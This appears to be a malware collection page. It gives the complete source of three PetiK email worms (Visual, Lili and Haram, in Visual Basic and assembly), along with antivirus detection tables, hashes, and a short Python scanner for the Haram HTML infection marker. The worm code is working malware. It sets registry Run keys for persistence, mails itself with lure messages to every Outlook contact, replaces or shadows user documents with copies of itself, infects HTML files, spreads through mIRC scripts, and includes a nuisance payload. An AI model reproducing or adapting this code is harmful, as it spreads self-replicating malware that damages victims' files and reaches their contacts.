ViRobot 2009.5.15.1737 2009.05.15 W97M.Apish.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petapwd.A

Additional information
File size: 37888 bytes
MD5...: 0b6d3ba97c607d4c334e45fda1907912
SHA1..: 826552b0aa5837a1c4c205d8c980d103deaafc01
' Name : W32.HLLW.Visual
' Author : PetiK
' Language : Visual Basic
' Date : 19/05/2002
'
'
'
'
Attribute VB_Name = "Module1"

Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
cop = fso.GetSpecialFolder(1) & "\kern32dll.exe"
FileCopy orig, cop
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop
fso.CreateFolder ("C:\Backup")

ncopy = ""
For I = 1 To 10
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
FileCopy orig, "C:\Backup\" & ncopy & ".exe"
Call inf(ws.SpecialFolders("MyDocuments"))

Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
If out = "Outlook" Then
map.Logon "profile", "password"
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 250 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "New Visual Tool for U"
mel.Body = "Look at this new tool by clicking on attached file."
mel.Attachments.Add orig, 1, 1, "visual_tool.exe"
mel.Send
e = ""
Next y
map.Logoff
End If

If Day(Now) = 19 Then about.Visible = True
End Sub

Sub inf(folder)
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
Set dire = fso.GetFolder(folder)
Set fc = dire.Files

For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
oext = LCase(f1.Name)
If (ext <> "vbs") Then
If (Right(oext, 8) <> "old_.exe") Then
'MsgBox oext, vbInformation, Right(oext, 8)
FileCopy orig, f1.Path & "old_.exe"
End If
End If
Next

End Sub
File Visual.exe received on 05.16.2009 19:47:59 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Backdoor.Win32.VB!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petvb.worm.9216
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!c440
Avast 4.8.1335.0 2009.05.15 Win32:Petik-C
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.K@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 Worm.VB-874
Comodo 1157 2009.05.08 Worm.Win32.Petik.VisTol
DrWeb 5.0.0.12182 2009.05.16 WIN.WORM.Virus
eSafe 7.0.17.0 2009.05.14 Win32.PetTick.dr
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petticky.A
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c440
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.U@mm
GData 19 2009.05.16 Win32.Petik.K@mm
Ikarus T3.1.1.49.0 2009.05.16 Backdoor.Win32.VB
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick.dr
McAfee+Artemis 5616 2009.05.15 W32/PetTick.dr
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik.VisTol
Norman 6.01.05 2009.05.16 W32/Petik.AQ
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.9216
Panda 10.0.0.14 2009.05.16 W32/Petik.R.worm
PCTools 4.4.2.0 2009.05.16 I-Worm.Petvtl.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Trojan.Petik.a
Sophos 4.41.0 2009.05.16 W32/Petik-U
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W32.Pet_Ticky.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetLil.A
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petvtl.A

Additional information
File size: 9216 bytes
MD5...: b2ff3ada6672ac9266a6fac5842ae706
SHA1..: 93d70d8a36a4139f494fe82fb8d418104a72a899
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W32.HLLW.Lili
' Author : PetiK
' Language : Visual Basic
' Date : 31/05/2002

Attribute VB_Name = "Module1"


Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)

Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Call CopyWorm
Call inf(App.Path)
Call inf(ws.SpecialFolders("MyDocuments"))
Call inf(fso.GetSpecialFolder(0))
Call inf(fso.GetSpecialFolder(1))
Call inf(fso.GetSpecialFolder(2))

If Day(Now) = 1 Or Day(Now) = 15 Or Day(Now) = 31 Then
xxxpic.Show 1
Else
MsgBox "Sorry, no XXX pic today. Wait And See.", vbExclamation, "XXX Pic"
End If
End Sub

Sub CopyWorm()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
copywrm = fso.GetSpecialFolder(0)
If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\"

For I = 1 To 8
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
copywrm = copywrm & ncopy & ".exe"
FileCopy orig, copywrm
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm
Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI")
FileCopy orig, "C:\XXXPic.exe"

Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
If out = "Outlook" Then
map.Logon "profile", "password"
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 250 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "XXX Picture..."
mel.Body = "A pretty girl waits for you. Click on attached file..."
mel.Attachments.Add "C:\XXXPic.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
End Sub

Sub inf(dir)
On Error Resume Next
orig = ""
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"

Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set pwoj = fso.GetFolder(dir)
Set fc = pwoj.Files
For Each f1 In fc
ext = LCase(fso.GetExtensionName(f1.Path))
If (ext = "vbs") Or (ext = "htm") Or (ext = "doc") Or (ext = "xls") Or (ext = "bmp") _
Or (ext = "gif") Or (ext = "jpg") Or (ext = "pdf") Or (ext = "js") Then
cpy = ""
cpy = Left(f1.Path, Len(f1.Path) - 4)
FileCopy orig, cpy & ".exe"
reg = fso.GetBaseName(f1.Path)
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & reg, cpy & ".exe"
End If
Next

End Sub
File Liliworm.exe received on 05.16.2009 17:43:19 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Lorm!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetLil.worm.37376
AntiVir 7.9.0.168 2009.05.15 VBS/Gorum.XPic.2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.A@mm
Avast 4.8.1335.0 2009.05.15 Win32:PetLil
AVG 8.5.0.336 2009.05.15 I-Worm/Lorm
BitDefender 7.2 2009.05.16 Win32.Petlil.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Lorm
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Lorm.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Generic.58
eSafe 7.0.17.0 2009.05.14 Win32.Lorm
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petlil.A
F-Prot 4.4.4.56 2009.05.16 W32/Petik.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Lorm
Fortinet 3.117.0.0 2009.05.16 W32/Petik.A@mm
GData 19 2009.05.16 Win32.Petlil.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Lorm
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Lorm
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Lorm
McAfee 5616 2009.05.15 W32/PetLil@MM
McAfee+Artemis 5616 2009.05.15 W32/PetLil@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Gorum.XPic.2
Microsoft 1.4602 2009.05.16 Worm:Win32/PetLil@mm
NOD32 4080 2009.05.15 Win32/Lorm.A
Norman 6.01.05 2009.05.16 Pet_Tick.37376.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Lorm.37376
Panda 10.0.0.14 2009.05.16 W32/Petlil.A
PCTools 4.4.2.0 2009.05.16 I-Worm.Petlil.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Liliworm
Sophos 4.41.0 2009.05.16 W32/Petlil-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Pet_Ticky.B@mm
Symantec 1.4.4.12 2009.05.16 W32.Pet_Ticky.B@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Lorm
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETLIL.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Lorm
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetLil.B
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petlil.A

Additional information
File size: 37376 bytes
MD5...: fce1de67fd47f4b6b67ab7eba0bf4246
SHA1..: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment *
Name : I-Worm.Haram
Author : PetiK

Language : win32asm
Date : May 13th 2002 - June 1st 2002

Size : 5192 bytes (compressed with Petite Tool)

Comments : - Copies itself to %sysdir%\FunnyGame.exe

- Searches all DOC files in the "Personal" folder and creates a new HTM virus file next to each:

example : document.doc -> document.htm

[screenshots in the original: 1) the good DOC file; 2) the HTM virus created beside it (1571 bytes)]

- Takes the name of every active process and appends .htm:

example : process.exe -> process.exe.htm

[screenshots in the original: 3) the real name of the active process; 4) the real name of the HTM virus (in the "C:\backup" folder on Win ME/2k/XP)]

- Creates a random-name file in the Startup folder to spread with Outlook

- On the 10th, payload : opens and closes the CD door and displays a message box in a loop
*

.586p
.model flat
.code
JUMPS

include win32api.inc

LF equ 10
CR equ 13
CRLF equ <13,10>

@pushsz macro msg2psh, empty


local next_instr
ifnb <empty>
%out too much arguments in macro '@pushsz'
.err
endif
call next_instr
db msg2psh,0
next_instr:
endm

@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm

api macro a
extrn a:proc
call a
endm

WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends

PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS

start: pushad
@SEH_SetupFrame <jmp end_worm>

hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA

get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi

copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy

push 50
push edi
push 1
@pushsz "Haram"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA

push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
call inf_doc_personal

get_startup_path:
push 0
push 7
push offset startup
push 0
api SHGetSpecialFolderPathA
push offset startup
api SetCurrentDirectoryA

call cr_vbsname

mov edi,offset vbsname


push 0
push 1
push 2
push 0
push 1
push 40000000h
push edi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle

payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA

push 500
api Sleep

xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA

push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA

api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload

end_payload:
call inf_process

end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess

hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP

inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax

cr_file:
push offset ffile.cFileName
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; back up over the ".doc" extension so it is overwritten with ".htm"
mov [esi],"mth."
lodsd

push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle

fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP

inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
api SetCurrentDirectoryA
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]

push ebx
push offset new_name
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push offset new_name
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_name
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push offset uProcess
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP

cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP

.data
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)

uProcess PROCESSENTRY32 <?>


ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)

orgwrm db 50 dup (0)


cpywrm db 50 dup (0)
msgwrm db 50 dup (0)
startup db 70 dup (0)
personal db 70 dup (0)
new_file db 90 dup (0)
vbsname db 20 dup (0)
byte_write dd ?
hfind dd ?

s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:

s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'On Error Resume Next',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Else',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:

s_vbs: db 'On Error Resume Next',CRLF


db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
db 'copyname = sys&"\FunnyGame.exe"',CRLF
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
db 'For each c In ofcc.AddressLists',CRLF
db 'If c.AddressEntries.Count <> 0 Then',CRLF
db 'For d = 1 To c.AddressEntries.Count',CRLF
db 'Set etldb = htgx.CreateItem(0)',CRLF
db 'etldb.To = c.AddressEntries(d).Address',CRLF
db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
db 'etldb.Attachments.Add(copyname)',CRLF
db 'etldb.DeleteAfterSubmit = True',CRLF
db 'If etldb.To <> "" Then',CRLF
db 'etldb.Send',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',0
e_vbs:

ends
end start
HARAM.HTM

<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
On Error Resume Next
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else

glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If

Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
Set bbbbbbbb=upfkupfk.GetFolder(dir)
Set bbblvqgl=bbbbbbbb.Files
For each lvqgvqgl in bbblvqgl
lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
If lvqglvqr="htm" or lvqglvqr="html" Then
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
if rhmwrrhm.ReadLine <> "<haram>" Then
rhmwrrhm.Close()
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
htmorg=rhmwrrhm.ReadAll()
rhmwrrhm.Close()
Set mwrrhmwr=document.body.createTextRange
Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
rhmwrrhm.WriteLine "<haram>"
rhmwrrhm.Write(htmorg)
rhmwrrhm.WriteLine mwrrhmwr.htmltext
rhmwrrhm.Close()
Else
rhmwrrhm.Close()
End If
End If
Next
End If
End Function
</script></body></html>
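The HTM infector above tests only the first line of each candidate file against the literal marker "<haram>" before prepending that marker, the original content and its own body. The same marker is therefore the cheapest indicator for a defender. The following Python is an added example, not code from the page or from the worm: it walks a directory tree, flags files whose first line is the marker, and restores the original content. The cut point it uses (the last <script> block that contains the appended function name "glvqglvb", through end of file) is an assumption about how the appended htmltext was serialised; the sample input is constructed.

```python
"""Find and restore HTML files carrying the '<haram>' infection marker.

Added example (not part of the original page or the worm). It relies only on
behaviour visible in HARAM.HTM: an infected file starts with a line that is
exactly '<haram>', followed by the original content, followed by the viral
body (a VBScript block whose function is named 'glvqglvb'). The cut point
(last <script> block containing that name, through end of file) is an
assumption about how IE serialised the appended htmltext.
"""
import os
import re

MARKER = "<haram>"
SIGNATURE = "glvqglvb"          # function name inside the appended script
SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)


def is_infected(html: str) -> bool:
    """Same test the worm performs: is the first line the marker?"""
    first_line = html.split("\n", 1)[0].rstrip("\r")
    return first_line == MARKER


def clean(html: str) -> str:
    """Return the pre-infection content of an infected HTML document."""
    if not is_infected(html):
        raise ValueError("no infection marker on first line")
    body = html.split("\n", 1)[1] if "\n" in html else ""
    last = None
    for m in SCRIPT_RE.finditer(body):
        if SIGNATURE in m.group(0):
            last = m
    if last is None:
        # Marker present but no recognisable payload: only the marker is dropped.
        return body
    return body[: last.start()]


def scan_tree(root: str):
    """Yield (path, cleaned_content) for every infected .htm/.html under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            try:
                # newline="" keeps the CRLF line endings the worm wrote
                with open(path, "r", encoding="latin-1", newline="") as fh:
                    content = fh.read()
            except OSError:
                continue
            if is_infected(content):
                yield path, clean(content)


# Constructed sample: a small page after the worm has prepended its marker
# and appended its own body.
SAMPLE_INFECTED = (
    "<haram>\r\n"
    "<html><body>hello</body></html>\r\n"
    "<SCRIPT language=VBScript>\r\n"
    "Function glvqglvb(dir)\r\nEnd Function\r\n"
    "</SCRIPT>\r\n"
)

if __name__ == "__main__":
    print(repr(clean(SAMPLE_INFECTED)))
```

scan_tree only yields the cleaned text; writing it back is left to the caller so that a copy of the infected file can be kept for evidence first.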

HARAM.VBS

On Error Resume Next


Set terqne = CreateObject("Scripting.FileSystemObject")
Set qumhzh = CreateObject("WScript.Shell")
Set sys = terqne.GetSpecialFolder(1)
copyname = sys&"\FunnyGame.exe"
Set htgx = CreateObject("Outlook.Application")
Set ofcc = htgx.GetNameSpace("MAPI")
For each c In ofcc.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set etldb = htgx.CreateItem(0)
etldb.To = c.AddressEntries(d).Address
etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name
etldb.Body = "Play at this funny game. It's very cool !"
etldb.Attachments.Add(copyname)
etldb.DeleteAfterSubmit = True
If etldb.To <> "" Then
etldb.Send
End If
Next
End If
Next
File Haram.exe received on 05.16.2009 11:58:29 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.worm.5192
AntiVir 7.9.0.168 2009.05.15 TR/Navigator.VBS
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!f42c
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIMbg.1C80A513
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 Worm.Funnygame
Comodo 1157 2009.05.08 Worm.Win32.Petik.Haram
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.7680
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 W32/Malware!f42c
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Generic.Malware.SIMbg.1C80A513
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!722436AE8486
McAfee-GW-Edition 6.7.6 2009.05.15 Trojan.Navigator.VBS
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick.H@mm
NOD32 4080 2009.05.15 Win32/Petik.Haram
Norman 6.01.05 2009.05.16 W32/Petik.AD
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.W.worm
PCTools 4.4.2.0 2009.05.15 I-Worm.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Win32.Petik
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5192
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Pethar.A

Additional information
